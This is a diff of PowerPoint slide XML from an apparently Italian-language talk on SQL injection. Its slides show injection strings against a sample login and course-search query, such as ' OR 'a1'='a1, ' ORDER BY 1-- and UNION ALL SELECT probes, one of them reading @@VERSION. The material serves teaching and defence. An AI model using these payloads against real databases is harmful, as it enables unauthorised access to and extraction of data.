+                <a:solidFill>
+                  <a:srgbClr val="92D050"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'a1</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="92D050"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="92D050"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'a1</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>';</a:t>
             </a:r>
             <a:endParaRPr sz="1600" dirty="0">
               <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
@@ -18879,7 +19897,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3032685187"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2446906015"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -18889,7 +19907,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide32.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -18918,6 +19936,297 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
+            <a:off x="2288581" y="1497613"/>
+            <a:ext cx="4566836" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Bobby Tables (xkcd.com #327)</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="120" name="Google Shape;120;p30"/>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="122" name="Google Shape;122;p30"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1311750" y="2070313"/>
+            <a:ext cx="6520500" cy="169200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" sz="1100" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="B7B7B7"/>
+                </a:solidFill>
+                <a:latin typeface="Barlow Condensed"/>
+                <a:ea typeface="Barlow Condensed"/>
+                <a:cs typeface="Barlow Condensed"/>
+                <a:sym typeface="Barlow Condensed"/>
+              </a:rPr>
+              <a:t>Molto più di una textbox</a:t>
+            </a:r>
+            <a:endParaRPr sz="1100" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="B7B7B7"/>
+              </a:solidFill>
+              <a:latin typeface="Barlow Condensed"/>
+              <a:ea typeface="Barlow Condensed"/>
+              <a:cs typeface="Barlow Condensed"/>
+              <a:sym typeface="Barlow Condensed"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="A cartoon of two people&#10;&#10;AI-generated content may be incorrect.">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74250F4B-E526-08C0-F935-DD5E12CE8501}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1594451" y="2432471"/>
+            <a:ext cx="5955097" cy="1834814"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide33.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:bg>
+      <p:bgPr>
+        <a:solidFill>
+          <a:srgbClr val="D93232"/>
+        </a:solidFill>
+        <a:effectLst/>
+      </p:bgPr>
+    </p:bg>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 169"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="170" name="Google Shape;170;p36"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="ctrTitle"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="311700" y="2894226"/>
+            <a:ext cx="8520600" cy="1199400"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Grazie!</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1700" u="sng" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="hlink"/>
+                </a:solidFill>
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>https://github.com/CodicePlastico/BibeCatalogue</a:t>
+            </a:r>
+            <a:endParaRPr sz="1700" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 118"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="Google Shape;119;p30"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
             <a:off x="2472833" y="1497613"/>
             <a:ext cx="4198334" cy="572700"/>
           </a:xfrm>
@@ -19118,7 +20427,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19382,6 +20691,9 @@
                 <a:solidFill>
                   <a:srgbClr val="FF0000"/>
                 </a:solidFill>
+                <a:highlight>
+                  <a:srgbClr val="00FFFF"/>
+                </a:highlight>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
               <a:t>' OR 'a1'='a1</a:t>
@@ -19390,6 +20702,9 @@
               <a:solidFill>
                 <a:srgbClr val="FF0000"/>
               </a:solidFill>
+              <a:highlight>
+                <a:srgbClr val="00FFFF"/>
+              </a:highlight>
               <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
             </a:endParaRPr>
           </a:p>
@@ -19408,7 +20723,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19473,7 +20788,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una buona password…</a:t>
+              <a:t>SQL Injection #1: WHERE poisoning</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -19643,7 +20958,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19697,18 +21012,10 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una buona password…</a:t>
+              <a:t>SQL Injection #1: WHERE poisoning</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -19831,16 +21138,40 @@
               <a:rPr lang="en-US" sz="1600" dirty="0">
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>WHERE (Email = 'test@example.com' AND Password = '</a:t>
+              <a:t>WHERE </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1600" dirty="0">
                 <a:solidFill>
+                  <a:srgbClr val="92D050"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>Email = 'test@example.com' AND Password = '</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
                   <a:srgbClr val="FF0000"/>
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>')</a:t>
+              <a:t>'</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="92D050"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>)</a:t>
             </a:r>
             <a:br>
               <a:rPr lang="en-US" sz="1600" dirty="0">
@@ -19884,7 +21215,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide9.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19949,7 +21280,15 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
+              <a:t>Recuperare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> il </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>numero</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -19957,7 +21296,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>campi</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -19965,7 +21304,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t>estratti</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -20060,25 +21399,7 @@
               <a:rPr lang="en-US" sz="1400" dirty="0">
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>	Id, Title, StartDate, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>EndDate</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>, Result, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>UserId</a:t>
+              <a:t>	*</a:t>
             </a:r>
             <a:br>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -20168,7 +21489,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>' UNION ALL SELECT NULL, @@VERSION, NULL, NULL, NULL, NULL ORDER BY 2--</a:t>
+              <a:t>' ORDER BY 1--</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -20186,6 +21507,301 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3774498867"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide9.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{535E5766-50FF-2563-3F1C-B40E98FE1BB1}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B816575F-A1F2-CC02-BE8B-F2A223969B1B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>SQL Injection #2: UNION ALL</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0D6E018-3A96-D35E-46AD-18E07D795DBF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{853F1DCA-31FB-0F18-B2F3-CBB8776A9E72}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' UNION ALL SELECT NULL, 'a', NULL, NULL, NULL, NULL ORDER BY 2--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
